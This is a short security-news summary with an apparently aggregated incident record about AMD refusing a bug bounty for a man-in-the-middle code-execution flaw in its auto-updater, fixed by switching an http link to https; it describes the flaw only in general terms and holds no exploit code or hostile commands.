AMD: AMD denies researcher a $10,000 bug bounty after fixing critical auto-updater vulnerability — security flaw took 124 days to patch

AMD Denies $10,000 Bug Bounty for RCE Flaw Despite Researcher’s Cooperation

AMD has refused to pay a $10,000 bug bounty to security researcher Paul, who reported a remote code execution (RCE) vulnerability in the company’s auto-updater software. The flaw, discovered via a man-in-the-middle (MITM) attack, was initially rejected under AMD’s bug bounty policy, which excluded MITM-based exploits.

Despite the denial, Paul cooperated with AMD, temporarily removing his public disclosure at the company’s request. AMD promised to issue a CVE, fix the software, and credit Paul but no bounty. The researcher later regretted the agreement, as AMD repeatedly extended the disclosure timeline, citing delays in patching "multiple tools" beyond the original scope. The fix, released on June 9 124 days after the initial report involved replacing an insecure "http" link with "https" in the code.

While AMD overhauled the updater’s download mechanism, Paul confirmed the new version now securely fetches drivers. However, the software still relies on the outdated CRC32 hash for file validation, which lacks cryptographic security. Adding irony to the situation, a Reddit user later noted the vulnerable code wasn’t even active, meaning the updater was already broken preventing AMD from pushing fixes until users manually downloaded the patched version.

The case highlights ongoing tensions between researchers and vendors over bug bounty policies, particularly when critical vulnerabilities are downplayed or excluded from payouts.

Source: https://www.tomshardware.com/tech-industry/cyber-security/amd-denies-researcher-a-usd10-000-bug-bounty-after-fixing-critical-auto-updater-vulnerability-security-flaw-took-124-days-to-patch

AMD cybersecurity rating report: https://www.rankiteo.com/company/amd

"id": "AMD1781267811",
"linkid": "amd",
"type": "Vulnerability",
"date": "2/2026",
"severity": "25",
"impact": "1",
"explanation": "Attack without any consequences"

{'affected_entities': [{'industry': 'Technology/Semiconductors',
                        'name': 'AMD',
                        'type': 'Corporation'}],
 'attack_vector': 'Man-in-the-Middle (MITM)',
 'customer_advisories': 'Users required to manually download the patched '
                        'version of the auto-updater software',
 'date_resolved': '2024-06-09',
 'description': 'AMD refused to pay a $10,000 bug bounty to security '
                'researcher Paul, who reported a remote code execution (RCE) '
                'vulnerability in the company’s auto-updater software. The '
                'flaw was discovered via a man-in-the-middle (MITM) attack and '
                'initially rejected under AMD’s bug bounty policy, which '
                'excluded MITM-based exploits. Despite cooperation from the '
                'researcher, AMD did not issue a bounty but promised a CVE, a '
                'fix, and credit. The fix involved replacing an insecure '
                "'http' link with 'https' in the code, though the software "
                'still relies on the outdated CRC32 hash for file validation.',
 'impact': {'brand_reputation_impact': 'Negative impact due to handling of bug '
                                       'bounty and vulnerability disclosure',
            'operational_impact': 'Prevented AMD from pushing fixes until '
                                  'users manually downloaded the patched '
                                  'version',
            'systems_affected': 'AMD auto-updater software'},
 'investigation_status': 'Resolved',
 'lessons_learned': 'Ongoing tensions between researchers and vendors over bug '
                    'bounty policies; critical vulnerabilities may be '
                    'downplayed or excluded from payouts.',
 'post_incident_analysis': {'corrective_actions': "Replaced 'http' with "
                                                  "'https'; overhauled "
                                                  'download mechanism; planned '
                                                  'future improvements to file '
                                                  'validation',
                            'root_causes': "Insecure 'http' link in "
                                           'auto-updater software; reliance on '
                                           'outdated CRC32 hash for file '
                                           'validation; bug bounty policy '
                                           'exclusion of MITM-based exploits'},
 'recommendations': 'Review and update bug bounty policies to include all '
                    'critical vulnerabilities; improve transparency and '
                    'timeliness in vulnerability disclosure and patching '
                    'processes.',
 'references': [{'source': 'Original Article'}],
 'response': {'communication_strategy': 'Delayed disclosure timeline; credited '
                                        'researcher but did not pay bounty',
              'containment_measures': "Replaced insecure 'http' link with "
                                      "'https' in the auto-updater software",
              'recovery_measures': 'Users required to manually download the '
                                   'patched version',
              'remediation_measures': 'Overhauled the updater’s download '
                                      'mechanism; fixed RCE vulnerability'},
 'title': 'AMD Denies $10,000 Bug Bounty for RCE Flaw Despite Researcher’s '
          'Cooperation',
 'type': 'Vulnerability Exploitation',
 'vulnerability_exploited': 'Remote Code Execution (RCE) in auto-updater '
                            'software'}